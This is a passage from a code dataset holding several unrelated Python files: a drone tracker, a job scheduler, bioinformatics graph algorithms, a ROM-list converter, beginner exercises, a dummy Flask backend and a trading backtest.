Tracking\r\n track_thresh = 0.5\r\n track_buffer = 30\r\n match_thresh = 0.8\r\n frame_rate = 25\r\n aspect_ratio_thresh = 1.6\r\n min_box_area = 10\r\n mot20_check = False\r\n res_file = os.path.join(txt_dir, video_path.split('/')[-1]+\".txt\")\r\n\r\n print(track_thresh, track_buffer, match_thresh, mot20_check, frame_rate)\r\n tracker = BYTETracker(track_thresh, track_buffer, match_thresh, mot20_check, frame_rate)\r\n timer = Timer()\r\n # cap = cv2.VideoCapture(video_path)\r\n frames=sorted(os.listdir(video_path))\r\n frames.remove(\"IR_label.json\")\r\n frame_id = 0\r\n results = []\r\n for i,frame in enumerate(frames):\r\n im0=cv2.imread(os.path.join(video_path,frame))\r\n height, width, _ = im0.shape\r\n t1 = time.time()\r\n #2-dim list\r\n if i==0:\r\n with open(os.path.join(video_path,\"IR_label.json\")) as f:\r\n res_first=json.load(f)\r\n dets=res_first[\"res\"] if \"res\" in res_first.keys() else res_first[\"gt_rect\"][0:1]\r\n dets[0][2]+=dets[0][0]\r\n dets[0][3]+=dets[0][1]\r\n dets[0].append(1.0)\r\n else:\r\n dets = deteted.inference(im0)\r\n if len(dets)>1:\r\n max_idx=0\r\n for i,d in enumerate(dets):\r\n if d[4]>dets[max_idx][4]:\r\n max_idx=i\r\n dets=dets[max_idx:max_idx+1]\r\n online_targets = tracker.update(np.array(dets), [height, width], (height, width)) if len(dets)!=0 else []\r\n online_tlwhs = []\r\n online_ids = []\r\n online_scores = []\r\n #print(len(online_targets)==0)\r\n for t in online_targets:\r\n tlwh = t.tlwh\r\n tid = t.track_id\r\n vertical = tlwh[2] / tlwh[3] > aspect_ratio_thresh\r\n online_tlwhs.append(tlwh)\r\n online_ids.append(tid)\r\n online_scores.append(t.score)\r\n # save result for evaluation\r\n tmp_list=[int(tlwh[0]),int(tlwh[1]),int(tlwh[2]),int(tlwh[3])]\r\n results.append(\r\n tmp_list\r\n )\r\n\r\n if online_targets==[]:\r\n results.append([])\r\n t2 = time.time()\r\n print(f\"FPS:{1 /(t2-t1):.2f}\")\r\n timer.toc()\r\n #print(1. / timer.average_time)\r\n # online_im = plot_tracking(im0, online_tlwhs, online_ids, frame_id=frame_id + 1, fps=1. / 1 /(t2-t1))\r\n # cv2.imshow(\"Frame\", online_im)\r\n if save_txt:\r\n with open(res_file, 'w+') as f:\r\n f.write(str({\"res\":results}))\r\n \r\n return results\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--source', type=str, default='inference/images', help='source') # file/folder, 0 for webcam\r\n opt = parser.parse_args()\r\n track_demo(opt.source)","repo_name":"LighteningDarkness/Drone-Detection-and-Tracking","sub_path":"track_demo.py","file_name":"track_demo.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16603581644","text":"\"\"\"\n Package colethon\n Module scheduler_bolsas.py\n\n Modulo para agendar as tarefas relativas a bolsas de valores,\n atraves do agendador utilitario do Python (lib schedule).\n\"\"\"\n\n# ----------------------------------------------------------------------------\n# DEPENDENCIAS\n# ----------------------------------------------------------------------------\n\n# Built-in/Generic modules\nimport time\nimport logging\nfrom queue import Queue\n\n# Libs/Frameworks modules\n# Own/Project modules\nfrom colethon.conf import app_config\nfrom colethon.jobs.bolsa.download_ibovespa_b3 import DownloadIbovespaB3\nfrom colethon.jobs.bolsa.download_intraday_b3 import DownloadIntradayB3\nfrom colethon.jobs.caixa.download_loterias_caixa import DownloadLoteriasCaixa\nfrom colethon.jobs.caixa.compute_sorteios_loterias import ComputeSorteiosLoterias\nfrom colethon.jobs.infra.zip_files_mql5 import ZipFilesMql5\nfrom colethon.jobs.infra.move_files_intranet import MoveFilesIntranet\n\n\n# ----------------------------------------------------------------------------\n# VARIAVEIS GLOBAIS\n# ----------------------------------------------------------------------------\n\n# obtem uma instância do logger para o modulo corrente:\nlogger = logging.getLogger(__name__)\n\n# pilha para armazenar os jobs a serem agendados/executados sequencialmente,\n# em ordem FIFO (First In, First Out), pois Python nao eh multi-thread na real.\nqueue_jobs = Queue(maxsize=10)\n\n\n# ----------------------------------------------------------------------------\n# MAIN ENTRY-POINT\n# ----------------------------------------------------------------------------\n\n# entry-point de execucao para tarefas agendadas:\ndef main():\n logger.info(\"Iniciando agendamento dos jobs relativos a Bolsas de Valores...\")\n\n # --- Agendamento dos Jobs em Fila ---------------------------------------\n\n # Download da Carteira Teorica do IBovespa\n queue_jobs.put(DownloadIbovespaB3())\n\n # Download das Cotacoes IntraDay da B3\n queue_jobs.put(DownloadIntradayB3())\n\n # Download dos Resultados das Loterias da Caixa:\n queue_jobs.put(DownloadLoteriasCaixa())\n\n # Processamento dos sorteios das das Loterias:\n queue_jobs.put(ComputeSorteiosLoterias())\n\n # Compactar arquivos CSV nos terminais MT5\n queue_jobs.put(ZipFilesMql5())\n\n # Copiar/mover arquivos para outra estacao\n queue_jobs.put(MoveFilesIntranet())\n\n # --- Monitoramento das Execucoes ----------------------------------------\n\n # mantem parametros em variaveis locais para melhor performance:\n loop_wait = app_config.SC_time_wait\n\n # mantem o script em execucao permanente enquanto houver jobs enfileirados...\n while not queue_jobs.empty(): # tem mais jobs?\n # obtem o proximo job e dispara sua execucao:\n job_obj = queue_jobs.get() # Fila do tipo FIFO: First In (put), First Out (get)\n job_idle_seconds = job_obj.job_interval # cada job tem seu tempo de espera especifico\n\n # executa o job em loop infinito, para o caso de ocorrer algum erro momentaneo\n while True:\n try:\n ret_ok = job_obj.run_job() # por enquanto, nao utiliza callbacks\n except:\n ret_ok = False\n # se o processamento foi realizado com sucesso, segue para proximo job:\n if ret_ok:\n break\n else:\n # aguarda um tempo antes de executar novamente\n time.sleep(job_idle_seconds)\n\n # aguarda periodo de tempo padrao, antes de executar proximo job:\n time.sleep(loop_wait)\n\n # finalizados todos os jobs, informa que o processamento foi ok:\n logger.info(\"Finalizados todos os jobs relativos a Bolsas de Valores.\")\n return 0\n\n# ----------------------------------------------------------------------------\n","repo_name":"olidv/Colethon","sub_path":"src/main/colethon/scheduler_bolsas.py","file_name":"scheduler_bolsas.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6248873097","text":"import random\r\nimport copy\r\nfrom functools import reduce\r\nfrom itertools import product\r\n\r\n### HamiltonianCycle(Graph) ###\r\n# Input: The adjacency list of a directed graph.\r\n# Output: An Hamiltonian cycle in this graph.\r\n#\r\n# Sample Input:\r\n# 0 -> 3\r\n# 1 -> 0\r\n# 2 -> 1,6\r\n# 3 -> 2\r\n# 4 -> 2\r\n# 5 -> 4\r\n# 6 -> 5,8\r\n# 7 -> 9\r\n# 8 -> 7\r\n# 9 -> 6\r\n# Sample Output:\r\n# [8, 7, 9, 6, 5, 4, 2, 1, 0, 3]\r\n\r\ndef HamiltonianCycle(Graph):\r\n nodes = list(Graph.keys())\r\n Cycle = list()\r\n\r\n all_nodes_flag = 0\r\n while not all_nodes_flag: # while there are unexplored edges in Graph\r\n # initialization - starting node\r\n node_visit_mark = [0]*len(nodes) # mark which nodes were visited -> 1 = visited\r\n Cycle.append(random.choice(nodes)) # random start node\r\n node_visit_mark[nodes.index(Cycle[0])] = 1\r\n # other nodes\r\n next_node = random.choice(Graph[Cycle[0]])\r\n while not node_visit_mark[nodes.index(next_node)]: # while next was not visited\r\n Cycle.append(next_node)\r\n node_visit_mark[nodes.index(Cycle[-1])] = 1\r\n next_node = random.choice(Graph[Cycle[-1]])\r\n if all(node_visit_mark):\r\n all_nodes_flag = 1\r\n else:\r\n Cycle = list()\r\n return Cycle\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### EulerianCycle(Graph) ###\r\n# Code Challenge: Solve the Eulerian Cycle Problem.\r\n# Input: The adjacency list of an Eulerian directed graph.\r\n# Output: An Eulerian cycle in this graph.\r\n#\r\n# Sample Input:\r\n# 0 -> 3\r\n# 1 -> 0\r\n# 2 -> 1,6\r\n# 3 -> 2\r\n# 4 -> 2\r\n# 5 -> 4\r\n# 6 -> 5,8\r\n# 7 -> 9\r\n# 8 -> 7\r\n# 9 -> 6\r\n# -> Graph = {0:[3], 1:[0], 2:[1. 6], 3:[2], 4:[2], 5:[4], 6:[5, 8], 7:[9], 8:[7], 9:[6]}\r\n# Sample Output:\r\n# 6->8->7->9->6->5->4->2->1->0->3->2->6\r\n\r\ndef EulerianCycle (Graph):\r\n # create edges list\r\n edges = []\r\n for n in list(Graph.keys()):\r\n for e in Graph[n]:\r\n edges.append((n, e))\r\n\r\n Cycle = []\r\n all_edges_flag = 0\r\n while not all_edges_flag: # while there are unexplored edges in Graph\r\n # initialization - starting edge\r\n edge_visit_mark = [0]*len(edges) # mark which edges were visited -> 1 = visited\r\n start_edge = random.choice(edges) # random start edge\r\n Cycle.append(start_edge[0])\r\n Cycle.append(start_edge[1])\r\n edge_visit_mark[edges.index(start_edge)] = 1\r\n # other edges\r\n next_edge = (Cycle[-1], random.choice(Graph[Cycle[-1]]))\r\n while not edge_visit_mark[edges.index(next_edge)]: # while next edge was not visited\r\n Cycle.append(next_edge[1])\r\n edge_visit_mark[edges.index(next_edge)] = 1\r\n next_edge = (Cycle[-1], random.choice(Graph[Cycle[-1]]))\r\n if all(edge_visit_mark): # and Graph[Cycle[-1]] == Cycle[0]:\r\n all_edges_flag = 1\r\n else:\r\n Cycle = list()\r\n return Cycle\r\n\r\n## another version\r\ndef EulerianCycle_v2(Graph):\r\n edge_dict = copy.deepcopy(Graph)\r\n\r\n # initializing - choosing random start node\r\n cur_node = random.choice(list(edge_dict.keys()))\r\n Cycle = [cur_node]\r\n\r\n flag = 1\r\n while flag:\r\n Cycle.append(edge_dict[cur_node][0]) # add next node to Cycle\r\n\r\n # deleting the edge visited from edge_dict, if the node has no more edges -> deleting the node\r\n if len(edge_dict[cur_node]) == 1:\r\n del edge_dict[cur_node]\r\n else:\r\n edge_dict[cur_node] = edge_dict[cur_node][1:]\r\n\r\n # checking the cycle:\r\n if Cycle[-1] in edge_dict: # if next node has more edges (its in edge_dict), update cur_node and continue\r\n cur_node = Cycle[-1]\r\n else: # if next node has no more edges\r\n if len(edge_dict) > 0: # if there are unvisited edges, restart new Cycle\r\n edge_dict = copy.deepcopy(Graph)\r\n cur_node = random.choice(list(edge_dict.keys()))\r\n Cycle = [cur_node]\r\n print('B')\r\n else: # if there are no unvisited edges\r\n flag = 0\r\n return Cycle\r\n\r\n## fast version\r\ndef EulerianCycle_fast(edge_dict):\r\n '''Generates an Eulerian cycle from the given edges.'''\r\n current_node = list(edge_dict.keys())[0]\r\n path = [current_node]\r\n # Get the initial cycle.\r\n while True:\r\n path.append(edge_dict[current_node][0])\r\n\r\n if len(edge_dict[current_node]) == 1:\r\n del edge_dict[current_node]\r\n else:\r\n edge_dict[current_node] = edge_dict[current_node][1:]\r\n\r\n if path[-1] in edge_dict:\r\n current_node = path[-1]\r\n else:\r\n break\r\n\r\n # Continually expand the initial cycle until we're out of edge_dict.\r\n while len(edge_dict) > 0:\r\n for i in range(len(path)):\r\n if path[i] in edge_dict:\r\n current_node = path[i]\r\n cycle = [current_node]\r\n while True:\r\n cycle.append(edge_dict[current_node][0])\r\n\r\n if len(edge_dict[current_node]) == 1:\r\n del edge_dict[current_node]\r\n else:\r\n edge_dict[current_node] = edge_dict[current_node][1:]\r\n\r\n if cycle[-1] in edge_dict:\r\n current_node = cycle[-1]\r\n else:\r\n break\r\n\r\n path = path[:i] + cycle + path[i+1:]\r\n break\r\n return path\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### EulerianPath(Graph) ###\r\n#Code Challenge: Solve the Eulerian Path Problem.\r\n# Input: The adjacency list of a directed graph that has an Eulerian path.\r\n# Output: An Eulerian path in this graph.\r\n\r\n# Sample Input:\r\n# 0 -> 2\r\n# 1 -> 3\r\n# 2 -> 1\r\n# 3 -> 0,4\r\n# 6 -> 3,7\r\n# 7 -> 8\r\n# 8 -> 9\r\n# 9 -> 6\r\n# -> Graph = {0:[2], 1:[3], 2:[1], 3:[0,4], 6:[3, 7], 7:[8], 8:[9], 9:[6]}\r\n# Sample Output:\r\n# 6->7->8->9->6->3->0->2->1->3->4\r\n# -> [6, 7, 8, 9, 6, 3, 0, 2, 1, 3, 4]\r\n\r\ndef EulerianPath(edge_dict):\r\n # Determine the unbalanced edges.\r\n out_values = reduce(lambda a, b: a + b, edge_dict.values())\r\n for node in set(out_values + list(edge_dict.keys())):\r\n out_value = out_values.count(node)\r\n if node in edge_dict:\r\n in_value = len(edge_dict[node])\r\n else:\r\n in_value = 0\r\n\r\n if in_value < out_value:\r\n unbalanced_from = node\r\n elif out_value < in_value:\r\n unbalanced_to = node\r\n\r\n # Add an edge connecting the unbalanced edges.\r\n if unbalanced_from in edge_dict:\r\n edge_dict[unbalanced_from].append(unbalanced_to)\r\n else:\r\n edge_dict[unbalanced_from] = [unbalanced_to]\r\n\r\n # Get the Eulerian Cycle from the edges, including the unbalanced edge.\r\n cycle = EulerianCycle_fast(edge_dict)\r\n\r\n # Find the location of the unbalanced edge in the eulerian cycle.\r\n divide_point = list(filter(lambda i: cycle[i:i + 2] == [unbalanced_from, unbalanced_to], range(len(cycle) - 1)))[0]\r\n\r\n # Remove the unbalanced edge, and shift appropriately, overlapping the head and tail.\r\n return cycle[divide_point + 1:] + cycle[1:divide_point + 1]\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### universal_circular_string(k) ###\r\n# Code Challenge: Solve the k-Universal Circular String Problem.\r\n# Input: An integer k.\r\n# Output: A k-universal circular string.\r\n# Sample Input: 4\r\n# Sample Output: 0000110010111101\r\n\r\ndef universal_circular_string (k):\r\n # Create edges dict for binary k mers (2^k k mers)\r\n universal_dict = {}\r\n for kmer in [''.join(item) for item in product('01', repeat=k)]:\r\n if kmer[:-1] in universal_dict:\r\n universal_dict[kmer[:-1]].append(kmer[1:])\r\n else:\r\n universal_dict[kmer[:-1]] = [kmer[1:]]\r\n\r\n # Get the cycle:\r\n path = EulerianCycle_fast(universal_dict)\r\n # remove the repeated last entry for the associated path (last and first entry are overlapping):\r\n path_string = ''.join([item[0] for item in path[:-1]])\r\n return path_string\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### PairedComposition(k, d, Text) ###\r\n# Input: k and d integers and string Text\r\n# Output:(k,d)-mer composition of Text (list of lists) -> the collection of all (k,d)- mers in Text\r\n# (including repeated (k,d)-mers)\r\n# Given a string Text, a (k,d)-mer is a pair of k-mers in Text separated by distance d.\r\n# For example, [AAT,TGG] is a (3,4)-mer in TAATGCCATGGGATGTT.\r\n\r\n# Sample Input: 3, 1, 'TAATGCCATGGGATGTT'\r\n# Sample Output:\r\n# [[AAT,CCA], [ATG,CAT], [ATG,GAT], [CAT,GGA], [CCA,GGG], [GCC,TGG], ->\r\n# -> [GGA,GTT, [GGG,TGT], [TAA,GCC], [TGC,ATG], [TGG,ATG]]\r\n\r\ndef PairedComposition(k, d, Text):\r\n composition = []\r\n for i in range(len(Text)-2*k-d+1):\r\n composition.append([Text[i:i+k], Text[i+k+d:i+d+2*k]])\r\n sorted_composition = sorted(composition, key=lambda x: x[0])\r\n return sorted_composition\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### StringReconstructionFromPairs(k, d) ###\r\n# Challenge: Solve the String Reconstruction from Read-Pairs Problem.\r\n# Input: Integers k and d followed by a collection of paired k-mers PairedReads.\r\n# Output: A string Text with (k, d)-mer composition equal to PairedReads.\r\n\r\n# Sample Input: k = 4 ; d = 2 ;\r\n# [[GAGA,TTGA], [TCGT,GATG], [CGTG,ATGT], [TGGT,TGAG], [GTGA,TGTT], ->\r\n# -> [GTGG,GTGA], [TGAG,GTTG], [GGTC,GAGA], [GTCG,AGAT]]\r\n# Sample Output:\r\n# GTGGTCGTGAGATGTTGA\r\n\r\ndef StringReconstructionFromPairs(k, d, paired_kmers):\r\n\r\n ## Construct a dictionary of edges from the paired reads:\r\n # Graph: edge = paired kmers ((kmer1, kmer2)); node = prefix (start node) / suffix (end node)\r\n # the graph is represented by dictionery: key = prefix (start node of an edge); value = suffix (ending node of an edge)\r\n\r\n paired_kmers_dict = {}\r\n for pair in paired_kmers:\r\n if (pair[0][:-1], pair[1][:-1]) in paired_kmers_dict: # if paired prefix is in dict\r\n paired_kmers_dict[(pair[0][:-1], pair[1][:-1])].append((pair[0][1:], pair[1][1:])) # add paired suffix\r\n else: # if paired prefix is not in dict\r\n paired_kmers_dict[(pair[0][:-1], pair[1][:-1])] = [(pair[0][1:], pair[1][1:])] # add paired prefix (= key) and paired sufffix (= value)\r\n\r\n ## Get an eulerian path from the paired edges:\r\n paired_path = EulerianPath(paired_kmers_dict)\r\n\r\n ## Recombine the paths, accounting for their overlaps.\r\n strings = [paired_path[0][i] + ''.join(map(lambda x: x[i][-1], paired_path[1:])) for i in range(2)]\r\n return strings[0][:k + d] + strings[1]\r\n\r\n# ---------------------------------------------------------------------------------------------\r\n### ContigGeneration(kmers) ###\r\n# Contig Generation Problem: Generate the contigs from a collection of reads (with imperfect coverage).\r\n# Input: A collection of k-mers kmers.\r\n# Output: All contigs in DeBruijn(Patterns).\r\n\r\n# Sample Input: ['ATG', 'ATG', 'TGT', 'TGG', 'CAT', 'GGA', 'GAT', 'AGA']\r\n# Sample Output:['AGA', 'ATG', 'ATG', 'CAT', 'GAT', 'TGGA', 'TGT']\r\n\r\ndef flatten (l):\r\n return flatten(l[0]) + (flatten(l[1:]) if len(l) > 1 else []) if type(l) is list else [l]\r\n\r\ndef ContigGeneration (kmers):\r\n # Construct a dictionary of edges.\r\n edges = {}\r\n for kmer in kmers:\r\n if kmer[:-1] in edges:\r\n edges[kmer[:-1]].append(kmer[1:])\r\n else:\r\n edges[kmer[:-1]] = [kmer[1:]]\r\n\r\n # Determine the balanced and unbalanced edges.\r\n balanced, unbalanced = [], []\r\n out_values = reduce(lambda a, b: a + b, edges.values())\r\n for node in set(out_values + list(edges.keys())):\r\n out_value = out_values.count(node)\r\n if node in edges:\r\n in_value = len(edges[node])\r\n else:\r\n in_value = 0\r\n\r\n if in_value == out_value == 1:\r\n balanced.append(node)\r\n else:\r\n unbalanced.append(node)\r\n\r\n # Generate the contigs.\r\n get_contigs = lambda s, c: flatten(\r\n [c + e[-1] if e not in balanced else get_contigs(e, c + e[-1]) for e in edges[s]])\r\n contigs = sorted(flatten([get_contigs(start, start) for start in set(unbalanced) & set(edges.keys())]))\r\n return contigs\r\n\r\n\r\n","repo_name":"zoharg2403/Coursera-Bioinfprmatics-II","sub_path":"Bioinformatics2_2.py","file_name":"Bioinformatics2_2.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36600915212","text":"import sys\nimport re\nimport zipfile\nimport os\n\ndef lreplace(pattern, sub, string):\n \"\"\"\n Replaces 'pattern' in 'string' with 'sub' if 'pattern' starts 'string'.\n \"\"\"\n return re.sub('^%s' % pattern, sub, string)\n\ndef load_file(filename):\n with open(filename) as fp:\n\n # create a list\n romlist=[]\n current_entry=None\n # do stuff with fp \n line = fp.readline()\n cnt = 1\n zip1p = re.compile('set zip1=(.*)')\n zip2p = re.compile('set zip2=(.*)')\n ifilesp = re.compile('set ifiles=(.*)')\n md5p= re.compile('set md5valid=(.*)')\n ofilep= re.compile('set *ofile=(.*)')\n fullnamep= re.compile('set fullname=(.*)')\n while line:\n #print(\"Line {}: {}\".format(cnt, line.strip()))\n ar1=zip1p.findall(line)\n zip1=''\n if (ar1):\n zip1=ar1[0]\n if (zip1):\n if (current_entry):\n romlist.append(current_entry)\n current_entry={}\n current_entry['zip1']=zip1.strip().replace('\\\\','/')\n ar1=zip2p.findall(line)\n if (ar1):\n current_entry['zip2']=ar1[0].strip().replace('\\\\','/')\n ar1=ifilesp.findall(line)\n if (ar1):\n\n current_entry['ifiles']=ar1[0].strip().replace('\\\\','/').split('+')\n ar1=md5p.findall(line)\n if (ar1):\n current_entry['md5']=ar1[0].strip()\n ar1=ofilep.findall(line)\n if (ar1):\n current_entry['ofile']=ar1[0].strip()\n ar1=fullnamep.findall(line)\n if (ar1):\n current_entry['fullname']=ar1[0].strip()\n \n\n \n cnt += 1\n line = fp.readline()\n if (current_entry):\n romlist.append(current_entry)\n\n\n return romlist\n\ndef process_roms(romlist):\n print(romlist[0]['ofile'].split('.'))\n rbfname=romlist[0]['ofile'].split('.')[1]\n rbfname=rbfname.capitalize()\n if (rbfname==\"Dkong\"):\n rbfname=\"DonkeyKong\"\n elif (rbfname==\"Alibbt\"):\n rbfname=\"Alibaba\"\n elif (rbfname==\"Asteroid\"):\n rbfname=\"Asteroids\"\n elif (rbfname==\"Astdelux\"):\n rbfname=\"AsteroidsDeluxe\"\n elif (rbfname==\"Azurn\"):\n rbfname=\"AzurianAttack\"\n elif (rbfname==\"Blckhl\"):\n rbfname=\"BlackHole\"\n elif (rbfname==\"Bmbjck\"):\n rbfname=\"BombJack\"\n elif (rbfname==\"Brubbr\"):\n rbfname=\"BurningRubber\"\n elif (rbfname==\"Btime\"):\n rbfname=\"BurgerTime\"\n elif (rbfname==\"Bwidow\"):\n rbfname=\"BlackWidow\"\n elif (rbfname==\"Canyon\"):\n rbfname=\"CanyonBomber\"\n elif (rbfname==\"Centiped\"):\n rbfname=\"Centipede\"\n elif (rbfname==\"Cclimb\"):\n rbfname=\"CrazyClimber\"\n elif (rbfname==\"Ckong\"):\n rbfname=\"CrazyKong\"\n elif (rbfname==\"Crush\"):\n rbfname=\"CrushRoller\"\n elif (rbfname==\"Csmvng\"):\n rbfname=\"CosmicAvenger\"\n elif (rbfname==\"Ctcomb\"):\n rbfname=\"Catacomb\"\n elif (rbfname==\"Dorodn\"):\n rbfname=\"Dorodon\"\n elif (rbfname==\"Drmshp\"):\n rbfname=\"DreamShopper\"\n elif (rbfname==\"Frggr\"):\n rbfname=\"Frogger\"\n elif (rbfname==\"Galaxn\"):\n rbfname=\"Galaxian\"\n elif (rbfname==\"Gorkns\"):\n rbfname=\"Gorkans\"\n elif (rbfname==\"Ladybg\"):\n rbfname=\"LadyBug\"\n elif (rbfname==\"Lizwiz\"):\n rbfname=\"LizardWizard\"\n elif (rbfname==\"Llander\"):\n rbfname=\"LunarLander\"\n elif (rbfname==\"Mspcmn\"):\n rbfname=\"MsPacman\"\n elif (rbfname==\"Orbtrn\"):\n rbfname=\"Orbitron\"\n elif (rbfname==\"Pacclb\"):\n rbfname=\"PacmanClub\"\n elif (rbfname==\"Pacpls\"):\n rbfname=\"PacmanPlus\"\n elif (rbfname==\"Phnx\"):\n rbfname=\"Phoenix\"\n elif (rbfname==\"Ponpok\"):\n rbfname=\"Ponpoko\"\n elif (rbfname==\"Scrmbl\"):\n rbfname=\"Scramble\"\n elif (rbfname==\"Snpjck\"):\n rbfname=\"SnapJack\"\n elif (rbfname==\"Sprglb\"):\n rbfname=\"SuperGlob\"\n elif (rbfname==\"Sbrkout\"):\n rbfname=\"SuperBreakout\"\n elif (rbfname==\"Tmplt\"):\n rbfname=\"TimePilot\"\n elif (rbfname==\"Travrusa\"):\n rbfname=\"TraverseUSA\"\n elif (rbfname==\"Vvcar\"):\n rbfname=\"VanVanCar\"\n elif (rbfname==\"Warbug\"):\n rbfname=\"WarOfTheBugs\"\n elif (rbfname==\"Wdpckr\"):\n rbfname=\"Woodpecker\"\n elif (rbfname==\"Xevs\"):\n rbfname=\"Xevious\"\n count = 0\n for rom in romlist:\n ofilename=rom['ofile'].replace('.rom','.mra')\n if count==0:\n ofiledir='_newarcade/'\n os.makedirs(ofiledir,exist_ok=True)\n ofilename=ofiledir+rbfname+'.mra'\n else:\n ofiledir='_newarcade/_hacks/_'+rbfname+'/'\n os.makedirs(ofiledir,exist_ok=True)\n ofilename=ofiledir+ofilename\n\n with open(ofilename,\"w\") as fp:\n zf1= zipfile.ZipFile(rom['zip1'], 'r')\n try:\n zf2= zipfile.ZipFile(rom['zip2'], 'r')\n mrazip2=lreplace('MAME/','',rom['zip2'])\n except KeyError:\n print ('ERROR: Did not find zip2')\n\n mrazip1=lreplace('MAME/','',rom['zip1'])\n\n fp.write('\\n')\n fp.write(' {}\\n'.format(rbfname))\n fp.write(' \\n'.format(mrazip1,rom['md5']))\n for part in rom['ifiles']:\n\n if part[0]=='\"':\n part=part.strip('\"')\n if part[0]=='.' and part[1]=='.':\n rfname=part.replace('../','')\n print('GOT REAL FILE {}'.format(rfname))\n with open(rfname,'rb') as rfp:\n fp.write(' \\n')\n hexcount=1\n byte = rfp.read(1)\n while byte:\n fp.write(byte.hex()+' ')\n if (not (hexcount %16)):\n fp.write('\\n')\n byte=rfp.read(1)\n hexcount=hexcount+1\n fp.write(' \\n')\n else:\n try:\n info = zf1.getinfo(part)\n except KeyError:\n print ('ERROR: Did not find %s in zip file' % part )\n try:\n info = zf2.getinfo(part)\n except KeyError:\n print ('ERROR: Did not find %s in zip file ' % part )\n else:\n print ('%s is %d bytes' % (info.filename, info.file_size))\n fp.write(' \\n'.format(mrazip2,part))\n else:\n print ('%s is %d bytes' % (info.filename, info.file_size))\n fp.write(' \\n'.format(part))\n fp.write(' ')\n fp.write(' ')\n print(rom)\n count=count+1\n\n\nif __name__ == \"__main__\":\n for arg in sys.argv:\n if (arg!=sys.argv[0]):\n romlist=load_file(arg)\n process_roms(romlist)\n","repo_name":"alanswx/MraExamples","sub_path":"bruno_bat_convert.py","file_name":"bruno_bat_convert.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"22"} +{"seq_id":"31263624255","text":"class Dog:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def sit(self):\n print(f\"{self.name} is now sitting.\")\n\n def roll_over(self):\n print(f\"{self.name} rolled over!\")\n\n\nmy_dog = Dog('Willie', 6)\nprint(f\"My dog's name is {my_dog.name}\")\nprint(f\"My dog is {my_dog.age} year old.\")\nmy_dog.sit()\nmy_dog.roll_over()\n\n\nyour_dog = Dog('Lucy', 3)\nprint(f\"Your dog's name is {your_dog.name}\")\nprint(f\"Your dog is {your_dog.age} year old.\")\nyour_dog.sit()\nyour_dog.roll_over()\n\n\nsuper_dog = Dog('SUPER', 27)\nprint(f\"This dog's name is {super_dog.name}\")\nprint(f\"This dog is {super_dog.age} year old.\")\nsuper_dog.sit()\nsuper_dog.roll_over()\n","repo_name":"DimaBaltin/test1","sub_path":"Class/new clas.py","file_name":"new clas.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28505734123","text":"from flask import Flask, request, jsonify\nimport json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/chat_test', methods=['POST'])\ndef chat_test():\n data = json.loads(request.get_data())\n print(data)\n print('Model: ' + data['model'])\n print('Prompt: ' + data['prompt'])\n response = {'status': input('type status: '), 'message': input('type response: ')}\n response = json.dumps(response)\n return response, 200\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"UEFI-code/BachelorGraduationDesign","sub_path":"Frontend/dummyBackend.py","file_name":"dummyBackend.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35496618926","text":"#26.py\n\"\"\"\n26. Numa eleição existem três candidatos. Faça um programa que peça o número \ntotal de eleitores. Peça para cada eleitor votar e ao final mostrar o número\nde votos de cada candidato.\n\"\"\"\nq = int(input(\"Digite a quantidade de eleitores: \"))\nvotos = []\ns = 0\nx = 0\n\nwhile x <= q - 1:\n\tvotos.append(input(\"\\nVote a/b/c: \"))\n\tx += 1\n\nx = 0\nk1 = 0\nk2 = 0\nk3 = 0\nwhile x <= q - 1:\n\tif votos[x] in 'a':\n\t\tk1 += 1\n\telif votos[x] in 'b':\n\t\tk2 += 1\n\telif votos[x] in 'c':\n\t\tk3 += 1\n\tx += 1\n\nprint('\\nCandidato a %d votos' %k1)\nprint('\\nCandidato b %d votos' %k2)\nprint('\\nCandidato c %d votos' %k3) ","repo_name":"VictorBezpy/EstruturaDeRepeticao","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24624564374","text":"import pandas_datareader as pdr\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nimport pandas as pd\r\nfrom backtesting import Backtest, Strategy\r\nfrom backtesting.lib import crossover\r\n\r\ndef SMA(values, n):\r\n return pd.Series(values).rolling(n).mean()\r\ndef EMA(values, n):\r\n return pd.Series(values).ewm(span=n,min_periods=0, adjust=False).mean()\r\ndef RSI(array, n=14):\r\n gain = pd.Series(array).diff()\r\n loss = gain.copy()\r\n gain[gain < 0] = 0\r\n loss[loss > 0] = 0\r\n rs = gain.ewm(span=n,min_periods=0,adjust=False).mean()/loss.abs().ewm(span=n,min_periods=0,adjust=False).mean()\r\n return 100 - 100 / (1 + rs)\r\n \r\nclass SMAC(Strategy):\r\n\t\tdef init(self):\r\n\t\t\tprice = self.data.Close\r\n\t\t\tself.sma1 = self.I(SMA, price, 10)\r\n\t\t\tself.sma2 = self.I(SMA, price, 20)\r\n\t\tdef next(self):\r\n\t\t\tif crossover(self.sma1, self.sma2):\r\n\t\t\t\tself.buy()\r\n\t\t\telif crossover(self.sma2, self.sma1):\r\n\t\t\t\tself.sell()\r\nclass EMAC(Strategy):\r\n def init(self):\r\n price = self.data.Close\r\n self.ema1 = self.I(EMA, price, 7)\r\n self.ema2 = 